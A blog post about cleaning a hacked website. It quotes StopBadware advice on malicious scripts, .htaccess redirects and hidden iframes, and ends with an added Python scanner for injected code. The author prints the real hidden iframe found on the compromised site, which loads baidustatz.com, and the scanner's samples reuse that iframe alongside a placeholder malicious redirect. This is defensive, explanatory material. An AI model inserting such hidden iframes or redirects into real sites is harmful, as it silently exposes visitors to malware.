
Saturday, 15 January 2011

Tips for Cleaning and Protecting a Website From Malware


Assalamu'alaikum..
Apologies to all of you if the subject of this thread is a bit over the top..

Actually, I'm only writing this to share a bit of my experience with the thing called malware, which attacked two of the websites I look after [http://www.jrberikari.com & http://www.ajimut.com] [it happened on 14.04.2010:02.30pm]..

When I tried to open the website, what came up instead was a screen like this..
[Image]

Because I was curious, I tried opening it through the Google search engine,
and, well, a warning came up instead..
[Image]

Following Google's instructions, I opened StopBadware.org.
Here is the content of one of the articles on that website.

[spoiler]
This page provides information about identifying, removing, and preventing badware on your website. It does not cover every situation, only the most common cases that we see at StopBadware. Some cases may require further assistance from a security professional. You may also find additional information and volunteer assistance in our online community.

We provide this advice as-is and cannot guarantee the results of following it. Like you, we do the best we can.

There are three basic steps to restoring and maintaining a clean website:

1. Identifying badware behavior
2. Removing the badware behavior
3. Preventing future infection

Identifying badware behavior

The first step to keeping your website badware-free is to check for any badware or badware behaviors that may already be on your site.

What to look for

The three most common forms of badware that StopBadware sees on compromised sites are:

1. Malicious scripts
2. .htaccess redirects
3. Hidden iframes

Malicious scripts

Malicious scripts are often used to redirect site visitors to a different website and/or load badware from another source. These scripts will often be injected by an attacker into the content of your web pages, or sometimes into other files on your server, such as images and PDFs. Sometimes, instead of injecting the entire script into your web pages, the attacker will only inject a pointer to a .js or other file that the attacker saves in a directory on your web server.

Many malicious scripts use obfuscation to make them more difficult for anti-virus scanners to detect:
[Image]

Some malicious scripts use names that look like they’re coming from legitimate sites (note the misspelling of “analytics”):
[Image]

.htaccess redirects

The Apache web server, which is used by many hosting providers, uses a hidden server file called .htaccess to configure certain access settings for directories on the website. Attackers will sometimes modify an existing .htaccess file on your web server or upload new .htaccess files to your web server containing instructions to redirect users to other websites, often ones that lead to badware downloads or fraudulent product sales.

[Image]

Hidden iframes

An iframe is a section of a web page that loads content from another page or site. Attackers will often inject malicious iframes into a web page or other file on your server. Often, these iframes will be configured so they don’t show up on the web page when someone visits the page, but the malicious content they are loading will still load, hidden from the visitor’s view.

[Image: picture of a hidden iframe injected in a web page]

How to look for it

If your site was reported as a badware site by Google, you can use Google’s Webmaster Tools to get more information about what was detected. This includes a sampling of pages on which the badware was detected and, using a Labs feature, possibly even a sample of the bad code that was found on your site. Certain information can also be found on the Google Diagnostics page, which can be found by replacing example.com in the following URL with your own site’s URL: http://www.google.com/safebrowsing/diag ... xample.com

There exist several free and paid website scanning services on the Internet that can help you zero in on specific badware on your site. There are also tools that you can use on your web server and/or on a downloaded copy of the files from your website to search for specific text. StopBadware does not list or recommend such services, but the volunteers in our online community will be glad to point you to their favorites.

Removing the badware behavior

Once you have located the code that is causing the badware behavior, removing it is often as simple as deleting the offending code from all files in which it appears. Sometimes, it is easier, if you have a clean backup of your site’s contents, to re-upload all of the site’s files, though be careful about overwriting files that may have changed since your last backup. In some cases, the bad content may be stored in one or more database records, in which case restoring a recent backup of the database or manually editing the relevant records may be necessary.

Preventing future infection

Preventing badware on your website requires protecting three things: your site itself, the password(s) used to upload content to the site, and the computer(s) used to upload content to the site. The site itself must be protected because attackers often look for vulnerable software to exploit so they can modify your site’s contents. The passwords are critical because, if they are guessed or stolen, they can be used to modify the site. Finally, computers are important because badware on your computer can steal your password and/or modify the contents that you are uploading.

Protect your site

* Ensure that any software you use (e.g., blogging software like WordPress, third party scripts, etc.) is kept up to date with the latest security fixes, either by you (if you installed the software) or by your hosting provider.
* Remove any scripts, services, or other software that you are no longer using.
* Change any default passwords that come with the software you are using.
* Use appropriate file permissions on your web server.

Protect your password

* Use a strong password and change it occasionally, especially if you have reason to think it has been compromised.
* Tips for choosing and protecting a strong password can be found at this helpful page

Protect your computer

* See our guide to preventing badware on your computer

Additional resources

Two members of our online community have guides to cleaning a badware-infected website:

* How to prevent your website from getting hacked & repair a damaged site
* Practical Guide to Dealing With Google’s Malware Warnings[/spoiler]

Once I'd finished reading that, I put it into practice straight away..
As a result I found one of the things mentioned above, namely hidden iframes..
Here, it looked like this..

<iframe src="http://baidustatz.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


So I deleted every iframe that wasn't supposed to be there..

But I was still curious about http://baidustatz.com..
So I searched on Google again..
And I got info like this..
[Image]

To guard against that kind of thing happening..
* Make sure that the software you use (for example, blogging software like WordPress, third-party scripts, etc.) stays up to date with the latest security fixes, either by you or by your hosting provider.
* Remove all scripts, events, or other software that you no longer use.
* Change any default passwords that come with the software you use.
* Use appropriate file permissions on your web server.

That's about it, I guess...
Hope it's useful for all of you...

Source: http://forum.ict-foundation.net/viewtop ... f=34&t=191
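
The search over a downloaded copy of the site that the StopBadware article describes, for hidden iframes and .htaccess redirects, as an added example (not code from the original post or from StopBadware). The sample files are constructed, apart from the iframe quoted in the post; `scan_site`, `own_hosts` and the example.* hosts are assumptions of this example.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from pathlib import Path

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|^hidden$", re.I)
# Redirect, RedirectMatch or RewriteRule with an absolute URL target; group 1 is the host.
HTACCESS_REDIRECT = re.compile(r"^\s*(?:Redirect(?:Match)?|RewriteRule)\b.*\bhttps?://([^/\s\"']+)", re.I)

class IframeFinder(HTMLParser):
    """Collects the src of iframes that are zero-sized or styled to be invisible."""
    def __init__(self):
        super().__init__()
        self.hits = []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        zero = a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
        if tag == "iframe" and (zero or HIDDEN_STYLE.search(a.get("style", ""))):
            self.hits.append(a.get("src", ""))

def scan_site(root, own_hosts=()):
    """Walk a downloaded copy of the site; return sorted (file, kind, detail) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            text = Path(root, rel).read_text(encoding="utf-8", errors="replace")
            if name == ".htaccess":
                for line in text.splitlines():
                    m = HTACCESS_REDIRECT.match(line)
                    # Redirects to the site's own hostnames (own_hosts) are expected.
                    if m and m.group(1).lower() not in own_hosts:
                        findings.append((rel, "htaccess-redirect", m.group(1)))
            elif name.lower().endswith((".html", ".htm", ".php")):
                finder = IframeFinder()
                finder.feed(text)
                findings += [(rel, "hidden-iframe", src) for src in finder.hits]
    return sorted(findings)

def demo():
    samples = {  # constructed site: injected page, clean page, tampered .htaccess
        "index.php": '<?php echo "hi"; ?><iframe src="http://baidustatz.com/lib/index.php" width=0 height=0 style="hidden"></iframe>',
        "about.html": '<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>',
        ".htaccess": "RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]\nRewriteRule ^(.*)$ http://redirect.example.net/in.php [R=302,L]\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_text(body, encoding="utf-8")
        return scan_site(root, own_hosts=("www.example.com",))
```

Each finding still needs a human look: a zero-sized iframe or an external redirect can be legitimate, and injected content stored in database records will not show up in a file scan.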
